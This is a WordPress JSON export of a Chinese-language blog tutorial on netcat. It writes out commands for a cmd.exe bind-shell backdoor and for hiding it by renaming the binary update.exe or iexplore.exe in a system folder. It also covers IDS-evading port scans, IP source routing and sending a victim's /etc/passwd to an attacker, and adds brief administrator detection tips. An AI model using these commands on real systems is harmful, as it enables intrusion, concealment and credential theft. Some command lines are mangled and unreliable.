{"id":146,"date":"2019-05-10T16:22:09","date_gmt":"2019-05-10T08:22:09","guid":{"rendered":"http:\/\/limitironbox.myds.me\/wordpress\/?p=146"},"modified":"2020-05-22T16:26:15","modified_gmt":"2020-05-22T08:26:15","slug":"%e7%b6%b2%e8%b7%af%e6%b8%ac%e8%a9%a6%e7%9a%84%e7%91%9e%e5%a3%ab%e5%88%80-netcat-%e7%9a%8410%e7%a8%ae%e4%bd%bf%e7%94%a8%e6%96%b9%e6%b3%95","status":"publish","type":"post","link":"https:\/\/limitironbox.myds.me\/wordpress\/%e7%b6%b2%e8%b7%af%e6%b8%ac%e8%a9%a6%e7%9a%84%e7%91%9e%e5%a3%ab%e5%88%80-netcat-%e7%9a%8410%e7%a8%ae%e4%bd%bf%e7%94%a8%e6%96%b9%e6%b3%95\/","title":{"rendered":"\u7db2\u8def\u6e2c\u8a66\u7684\u745e\u58eb\u5200 NETCAT \u768410+\u7a2e\u4f7f\u7528\u65b9\u6cd5"},"content":{"rendered":"<header class=\"entry-header\">\n<h2 class=\"entry-title\"><img decoding=\"async\" style=\"font-family: 'Exo 2', sans-serif; font-size: 1rem; font-weight: 300;\" src=\"https:\/\/i.imgur.com\/gHw2Q50.gif\" alt=\"\" \/><\/h2>\n<\/header>\n<div class=\"entry-content\">\n<p>\u56e0\u70ba NETCat \u662f\u4e00\u500b\u5f88\u5c0f\u7684\u57f7\u884c\u5de5\u5177\uff0c\u53ef\u4ee5\u7528\u5728client\/server\u7684\u8a31\u591a\u4e0d\u540c\u60c5\u5883\u4e0b\u7684\u6e9d\u901a\uff0c<\/p>\n<p>\u56e0\u70ba\u4e5f\u5e38\u88ab\u99ed\u5ba2\u7528\u4f86\u505a\u7db2\u8def\u5de5\u5177\u6216\u662f\u7db2\u8def\u5075\u6e2c\u7684\u5de5\u5177\u3002<\/p>\n<p>\u4f8b\u5982\uff1a\u958b\u555f\u5f8c\u9580\u3001\u9060\u7aef\u57f7\u884c\u3001\u6383\u63cf\u7db2\u8def\u3001\u6a94\u6848\u50b3\u8f38\u7b49\uff0c\u90fd\u53ef\u4ee5\u900f\u904e NETCat\u5b8c\u6210\u3002<\/p>\n<h2>NetCAT \u4e0b\u8f09<\/h2>\n<p>&nbsp;<\/p>\n<ul>\n<li><a href=\"http:\/\/netcat.sourceforge.net\/download.php\">http:\/\/netcat.sourceforge.net\/download.php<\/a><\/li>\n<li><a href=\"https:\/\/nmap.org\/ncat\/\">https:\/\/nmap.org\/ncat\/<\/a><\/li>\n<\/ul>\n<ul>\n<li><b>Latest release self-installer:<\/b>\u00a0<a 
href=\"https:\/\/nmap.org\/dist\/nmap-6.49BETA5-setup-xp.exe\">nmap-6.49BETA5-setup-xp.exe<\/a><\/li>\n<li><strong>\u57f7\u884c\u7a0b\u5f0f\u9700\u5b89\u88ddVIsual C++ 2013 x86<\/strong><\/li>\n<\/ul>\n<p>&nbsp;<\/p>\n<h2>\u00a0\u5f8c\u9580\u7a0b\u5f0f or \u9060\u7aef\u57f7\u884c<\/h2>\n<p><img decoding=\"async\" src=\"http:\/\/blog.teesupport.com\/wp-content\/uploads\/2011\/07\/backdoor.png\" alt=\"\" \/><\/p>\n<p>\u5982\u679c\u6211\u5011\u5e0c\u671b \u00a010.0.0.1\u9019\u53f0\u96fb\u8166\u53ef\u4ee5\u900f\u904e port 4455 \u88ab\u9060\u7aef\u9023\u7dda\u4e4b\u5f8c\u53ef\u4ee5\u57f7\u884c Command line \u6307\u4ee4\uff0c<\/p>\n<p>\u90a3\u9ebc\u53ea\u8981\u572810.0.0.1\u9019\u53f0\u96fb\u8166A\u57f7\u884c netCat<\/p>\n<table>\n<tbody>\n<tr>\n<td>C:\\&gt; ncat \u00a0-l \u00a0 \u00a0-e \u00a0cmd.exe \u00a010.0.0.1 \u00a0 4455<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>\u6216\u662f<\/p>\n<p>&nbsp;<\/p>\n<table width=\"359\">\n<tbody>\n<tr>\n<td>C:\\&gt; ncat.exe \u2013k -l \u2013e cmd.exe 4455<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>&nbsp;<\/p>\n<p>\u56e0\u6b64\u9060\u7aef\u96fb\u8166\u53ea\u8981\u9023\u7dda\u9053\u8a72 10.0.0.1 port 4455 \u5c31\u53ef\u4ee5\u57f7\u884c 10.0.0.1\u7684 command line<\/p>\n<p>\u9019\u5c31\u662f\u4fd7\u7a31\u7684 Back Door\u5f8c\u9580\u7a0b\u5f0f\uff0c\u8b93\u9060\u7aef\u96fb\u8166\u53ef\u4ee5\u9023\u7dda\u5f8c\u57f7\u884c\u7279\u5b9a\u6307\u4ee4\u3002<\/p>\n<p>\u9060\u7aef\u96fb\u8166B\u57f7\u884c netCat \u9023\u7dda<\/p>\n<table width=\"249\">\n<tbody>\n<tr>\n<td>ncat.exe \u00a0 10.0.0.1 \u00a04455<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>\u9023\u7dda\u6210\u529f\u5f8c\u5c31\u53ef\u4ee5\u57f7\u884c\u4efb\u4f55 Command line \u4e0b\u7684\u6307\u4ee4<\/p>\n<p>&nbsp;<\/p>\n<h2>\u96b1\u85cf NetCAT.exe<\/h2>\n<p>\u7531\u65bc\u57f7\u884c ncat.exe \u5f88\u5bb9\u6613\u5728 Task Manager 
\u88ab\u767c\u73fe\uff0c\u56e0\u6b64\u901a\u5e38\u99ed\u5ba2\u57f7\u884c\u9019\u500b\u5de5\u5177\u6703\u5c07\u6a94\u540d\u6539\u8b8a\u3002\u907f\u514d\u88ab\u7cfb\u7d71\u7ba1\u7406\u8005\u767c\u73fe\u3002<\/p>\n<p>&nbsp;<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/www.javcasta.com\/blog\/wp-content\/uploads\/2010\/09\/TaskManager.jpg\" alt=\"\" \/><\/p>\n<p>\u4f8b\u5982\uff0c\u5c07 NetCAT.exe \u66f4\u6539\u6a94\u540d\u70ba update.exe \u4e26\u4e14\u653e\u5230\u7cfb\u7d71\u76ee\u9304\uff0c\u518d\u57f7\u884c\u5f8c\u9580\u7a0b\u5f0f\u3002<\/p>\n<table width=\"691\">\n<tbody>\n<tr>\n<td>C:\\&gt; move ncat.exe \u00a0 \u00a0c:\\Windows\\System32\\Drivers\\update.exe\u00a0C:\\&gt; Windows\\System32\\Drivers\\update.exe\u00a0\u2013k -l \u2013e cmd.exe 4455<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>\u6216\u662f\u5229\u7528 \u6bd4\u8f03\u4e0d\u6703\u88ab\u5bdf\u89ba\u7684 port 80<\/p>\n<table width=\"725\">\n<tbody>\n<tr>\n<td>C:\\&gt; mkdir C:\\Windows\\System32\\Drivers\\qC:\\&gt; move ncat.exe \u00a0 \u00a0C:\\Windows\\System32\\Drivers\\q\\iexplore.exeC:\\&gt; cd Windows\\System32\\Drivers\\q<\/p>\n<p>C:\\WINDOWS\\System32\\DRIVERS\\q\\&gt;\u00a0iexplore.exe\u00a0-e cmd.exe hostname 80<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>\u5982\u6b64\u4e00\u4f86\u770b\u8d77\u4f86\u5c31\u6703\u50cf\u662f\u00a0 Internet Explorer\u8981\u900f\u904e port 80 \u9023\u7dda HTTP<\/p>\n<h2>\u7cfb\u7d71\u7ba1\u7406\u8005\u5c0d\u65bc NetCAT\u7684\u57fa\u672c\u6aa2\u67e5<\/h2>\n<p>\u53e6\u4e00\u65b9\u9762\u8b93\u6211\u5011\u770b\u770b\u7cfb\u7d71\u7ba1\u7406\u8005\u53ef\u4ee5\u505a\u54ea\u4e9b\u57fa\u672c\u6aa2\u67e5\uff0c\u9a57\u8b49\u662f\u5426\u6709\u88ab\u57f7\u884c\u5f8c\u9580\u7a0b\u5f0f or NetCAT\u5462?<\/p>\n<h3>Task Manager<\/h3>\n<p>\u67e5\u770b\u662f\u5426\u6709 nc.exe \u00a0NetCAT.exe 
\u00a0ncat.exe\u7684\u7a0b\u5e8f\u6b63\u5728\u57f7\u884c\u3002\u7576\u7136\u5982\u679c\u8a72\u7a0b\u5e8f\u5df2\u7d93\u88ab\u66f4\u6539\u6a94\u540d\uff0c\u5c31\u7121\u6cd5\u900f\u904e\u9019\u500b\u65b9\u5f0f\u5f97\u77e5\u3002\u6b64\u6642\u53ef\u900f\u904e\u4e0b\u65b9\u7684 netstat -nab \u67e5\u770b\u6b63\u5728 listening \u7684 port \u8207\u5c0d\u61c9\u7684\u57f7\u884c\u6a94\u4f86\u5224\u65b7\u3002<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/www.javcasta.com\/blog\/wp-content\/uploads\/2010\/09\/TaskManager.jpg\" alt=\"\" \/><\/p>\n<h3>Netstat \u67e5\u770b port \u7684\u57f7\u884c\u72c0\u6cc1<\/h3>\n<p>\u67e5\u770b\u54ea\u4e9b port\u6b63\u5728 listening<\/p>\n<table>\n<tbody>\n<tr>\n<td>netstat \u00a0-nab<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><img decoding=\"async\" loading=\"lazy\" class=\"\" src=\"http:\/\/cdn.ttgtmedia.com\/digitalguide\/images\/Misc\/wf_1.jpg\" alt=\"\" width=\"534\" height=\"396\" \/><\/p>\n<h2>Port Scanning<\/h2>\n<p>\u5118\u7ba1 NetCAT \u4e3b\u8981\u7684\u529f\u80fd\u4e0d\u662f\u7528\u4f86\u505a port Scanning\uff0c\u9084\u662f\u53ef\u4ee5\u7528 NetCAT \u505a\u57fa\u672c port\u7684\u6383\u63cf\u3002<\/p>\n<table width=\"639\">\n<tbody>\n<tr>\n<td>$ nc -z 10.0.0.1 \u00a020-80Connection to 10.0.0.1 \u00a022 port [tcp\/ssh] succeeded!<\/p>\n<p>Connection to 10.0.0.1 80 port [tcp\/http] succeeded!<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>\u7531\u65bc\u9019\u6a23\u7684port scanning \u7db2\u8def\u884c\u70ba\u5f88\u5bb9\u6613\u88ab IDS \u767c\u73fe\uff0c\u56e0\u6b64\u53ef\u4ee5\u52a0\u5165\u4e00\u4e9b\u5176\u4ed6\u53c3\u6578\u6e1b\u5c11\u88ab IDS\u5075\u6e2c\u5230\u7684\u6a5f\u7387<\/p>\n<p>-r: \u00a0\u96a8\u6a5f\u6383\u7784<\/p>\n<p>-i: \u6bcf\u9694 30\u79d2\uff0c\u6383\u63cf\u4e00\u500b port<\/p>\n<table>\n<tbody>\n<tr>\n<td>$ nc -v -z\u00a0-r -i 30\u00a010.0.0.1 \u00a0\u00a020-80<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>&nbsp;<\/p>\n<h2>Port Scanning \u57fa\u672c\u539f\u7406<\/h2>\n<p>port scanning \u4e3b\u8981\u5229\u7528 TCP \u9023\u7dda\u6642\u7684\u57fa\u672c\u539f\u7406 3-way handshake \uff0c\u900f\u904e3-way handshake \u7684\u56de\u61c9\u4f86\u5224\u65b7\u9060\u7aef\u96fb\u8166 port 
\u662f\u5426\u6709\u958b\u555f\u3002<\/p>\n<p>\u7c21\u55ae\u4f86\u8aaa\uff1a\u5982\u679c port\u6709\u901a\u7684\u8a71\u4e00\u5b9a\u6703\u6709 \u201cSYN\/ACK\u201d\u7684\u56de\u8986\u3002\u5982\u679c\u6c92\u6709\u56de\u8986\u6216\u662f\u56de\u8986\u5176\u4ed6\u7684\u72c0\u614b RST\u90fd\u8868\u793a port \u6c92\u6709\u901a\u3002<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/fadils.files.wordpress.com\/2008\/06\/3-way-hs.jpg\" alt=\"\" \/><\/p>\n<p>&nbsp;<\/p>\n<p>\u4f8b\u5982\u4e0b\u5716\uff0c\u9060\u7aefServer\u96fb\u8166\u56de\u8986 \u201cRST\u201d\uff0c\u8868\u793a port \u6c92\u6709\u901a\u3002<\/p>\n<p><img decoding=\"async\" loading=\"lazy\" class=\"\" src=\"http:\/\/resources.infosecinstitute.com\/wp-content\/uploads\/101613_1123_PortScannin2.jpg\" alt=\"\" width=\"468\" height=\"209\" \/><\/p>\n<p>\u4f8b\u5982\u4e0b\u5716\uff0c\u9060\u7aefServer\u96fb\u8166\u56de\u8986 \u201cSYN+ACK\u201d\uff0c\u8868\u793a port \u6709\u901a\u3002<\/p>\n<p>&nbsp;<\/p>\n<p><img decoding=\"async\" loading=\"lazy\" class=\"\" src=\"http:\/\/img.wonderhowto.com\/img\/36\/13\/63578617777373\/0\/build-stealth-port-scanner-with-scapy-and-python.w654.jpg\" alt=\"\" width=\"455\" height=\"203\" \/><\/p>\n<h2>UDP port Scanning<\/h2>\n<p>\u9019\u662f TCP\u7684\u7279\u6027\uff0c\u90a3\u9ebcUDP\u53ef\u4ee5\u9019\u6a23\u505a\u55ce?<\/p>\n<p>\u5118\u7ba1\u6211\u5011\u53ef\u4ee5\u900f\u904e\u4e0b\u5217\u6307\u4ee4\u5c0d\u65bc UDP port \u4f5c\u6383\u63cf\uff0c\u4f46\u662f UDP\u7684\u6383\u63cf\u76f8\u5c0d\u6703\u6709\u4e0d\u6e96\u78ba\u7684\u72c0\u6cc1\u3002<\/p>\n<table>\n<tbody>\n<tr>\n<td>nc -v -z -r\u00a0-u\u00a0-i 30 10.1.1.1 \u00a0\u00a020-80<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>&nbsp;<\/p>\n<p>\u5c0d\u65bcUDP port \u662f\u5426\u6709\u901a\uff0c NC \u4e3b\u8981\u900f\u904e Internet Control Message Protocol (ICMP) \u7684\u932f\u8aa4\u8a0a\u606f\u4f86\u5224\u65b7\uff0c<\/p>\n<p>\u4f46\u662f\u8a31\u591a\u7684\u9632\u706b\u7246\u6703\u8a2d\u5b9a\u4e0d\u56de\u8986 
ICMP\uff0c\u9019\u6703\u9020\u6210\u6383\u63cf\u7684\u7d50\u679c\u8aa4\u5224\u7684\u6a5f\u7387\u63d0\u9ad8\u3002<\/p>\n<h2>\u9060\u7aef\u4e3b\u6a5f\u7684\u670d\u52d9\u8cc7\u8a0a<\/h2>\n<p>\u77e5\u9053\u54ea\u4e9b port \u6709\u901a\u6c92\u6709\u901a\u4e4b\u5f8c\uff0c\u53ef\u4ee5\u9032\u4e00\u6b65\u7372\u53d6\u6bcf\u500b port \u7684\u670d\u52d9\u8cc7\u8a0a\u3002\u4f8b\u5982\u662f\u4f7f\u7528\u54ea\u7a2e Web server or FTP server<\/p>\n<table>\n<tbody>\n<tr>\n<td>$ echo QUIT | nc -v 10.1.1.1 \u00a0 \u00a021 22 80<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>&nbsp;<\/p>\n<table>\n<tbody>\n<tr>\n<td>$nc -v 10.1.1.1 \u00a0\u00a080<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>\u4f8b\u5982\u8207 syslog\u6e9d\u901a<\/p>\n<table>\n<tbody>\n<tr>\n<td>$ echo \u201c0I can speak syslog\u201d | nc -u 10.1.1.1 \u00a0514<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>&nbsp;<\/p>\n<h2>\u507d\u9020 IP<\/h2>\n<p>NetCAT \u9084\u53ef\u4ee5\u8b8a\u9020\u904e\u7a0b\u4e2d\u7d93\u904e\u7684\u7d50\u9ede IP\u3002<\/p>\n<p>\u4f8b\u5982\u9019\u500b\u4f8b\u5b50\uff0c\u6700\u7d42\u76ee\u7684\u5730\u70ba 10.1.1.1 \u7684 port 23\u3002\u4f46\u662f\u4e2d\u9593\u7684\u7d50\u9ede\u8b8a\u9020\u7d93\u904e\u4e86 10.10.4.5 \u202610.10.5.8 \u7b49<\/p>\n<table width=\"712\">\n<tbody>\n<tr>\n<td>nc\u00a0\u2013g\u00a010.10.4.5\u00a0\u2013g\u00a010.10.5.8\u00a0\u2013g\u00a010.10.7.4\u00a0\u2013g\u00a010.10.9.9 \u00a0 \u00a0 10.1.1.1 \u00a0 23<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>&nbsp;<\/p>\n<h2>\u6a94\u6848\u7684\u50b3\u8f38<\/h2>\n<p>\u53ef\u4ee5\u900f\u904e NetCAT \u5c07\u9060\u7aef\u96fb\u8166\u7684\u6a5f\u5bc6\u6a94\u6848\u56de\u50b3\u3002\u4f8b\u5982\u7cfb\u7d71\u9810\u8a2d\u7684\u5bc6\u78bc\u6a94\u6848\u3002<\/p>\n<p>\u9060\u7aef\u96fb\u8166 (\u53d7\u5bb3\u8005\u96fb\u8166)<\/p>\n<table>\n<tbody>\n<tr>\n<td>$ nc \u2013l \u2013u 55555 &lt; file_we_want<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<table width=\"411\">\n<tbody>\n<tr>\n<td>$ nc \u2013l \u2013u 55555 &lt; 
\/etc\/passwd<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>\u99ed\u5ba2\u96fb\u8166<\/p>\n<table>\n<tbody>\n<tr>\n<td>nc \u2013u \u2013targethost 55555 &lt; copy_of_file<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>&nbsp;<\/p>\n<p>NetCat \u7684\u7528\u9014\u5f88\u5ee3\u6cdb\uff0c\u4e5f\u5c31\u662f\u70ba\u4ec0\u9ebc\u88ab\u8996\u70ba\u99ed\u5ba2\u5de5\u5177\u7684\u745e\u58eb\u5c0f\u5200\uff0c<\/p>\n<p>\u7576\u7136\u4e5f\u88ab\u9632\u6bd2\u8edf\u9ad4\u8996\u70ba\u662f\u5f8c\u9580\u7a0b\u5f0f\u7981\u6b62\u57f7\u884c\u3002<\/p>\n<p>&nbsp;<\/p>\n<\/div>\n","protected":false},"excerpt":{"rendered":"<p>\u56e0\u70ba NETCat \u662f\u4e00\u500b\u5f88\u5c0f\u7684\u57f7\u884c\u5de5\u5177&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"pmpro_default_level":""},"categories":[6],"tags":[],"_links":{"self":[{"href":"https:\/\/limitironbox.myds.me\/wordpress\/wp-json\/wp\/v2\/posts\/146"}],"collection":[{"href":"https:\/\/limitironbox.myds.me\/wordpress\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/limitironbox.myds.me\/wordpress\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/limitironbox.myds.me\/wordpress\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/limitironbox.myds.me\/wordpress\/wp-json\/wp\/v2\/comments?post=146"}],"version-history":[{"count":3,"href":"https:\/\/limitironbox.myds.me\/wordpress\/wp-json\/wp\/v2\/posts\/146\/revisions"}],"predecessor-version":[{"id":154,"href":"https:\/\/limitironbox.myds.me\/wordpress\/wp-json\/wp\/v2\/posts\/146\/revisions\/154"}],"wp:attachment":[{"href":"https:\/\/limitironbox.myds.me\/wordpress\/wp-json\/wp\/v2\/media?parent=146"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/limitironbox.myds.me\/wordpress\/wp-json\/wp\/v2\/categories?post=146"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/limitironbox.myds.me\/wordpress\
/wp-json\/wp\/v2\/tags?post=146"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}